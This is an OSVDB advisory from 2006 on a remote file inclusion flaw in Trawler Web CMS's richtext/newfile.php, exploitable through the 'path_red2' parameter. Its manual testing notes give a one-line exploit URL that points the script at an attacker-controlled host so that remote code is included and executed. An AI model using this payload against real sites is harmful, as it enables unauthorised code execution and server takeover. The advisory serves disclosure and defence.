Trawler Web CMS richtext/newfile.php path_red2 Variable Remote File Inclusion

2006-10-21T12:33:52
ID OSVDB:29967
Type osvdb
Reporter k1tk4t(k1k4t@newhack.org)
Modified 2006-10-21T12:33:52

Description

Vulnerability Description

Trawler Web CMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to richtext/newfile.php not properly sanitizing user input supplied to the 'path_red2' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on'. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002).

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

Trawler Web CMS contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to richtext/newfile.php not properly sanitizing user input supplied to the 'path_red2' variable. This may allow an attacker to include a file from a remote host that contains arbitrary commands which will be executed by the vulnerable script.

Manual Testing Notes

http://[target]/_msdazu_share/richtext/newfile.php?path_red2=http://[attacker]

References:

Vendor URL: http://harald-kampen.de/cms.htm Secunia Advisory ID:22525 Related OSVDB ID: 29964 Related OSVDB ID: 29968 Related OSVDB ID: 29969 Related OSVDB ID: 29965 Related OSVDB ID: 29961 Related OSVDB ID: 29960 Related OSVDB ID: 29962 Related OSVDB ID: 29963 Related OSVDB ID: 29966 Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-10/0365.html Generic Exploit URL: http://milw0rm.com/exploits/2611 CVE-2006-5495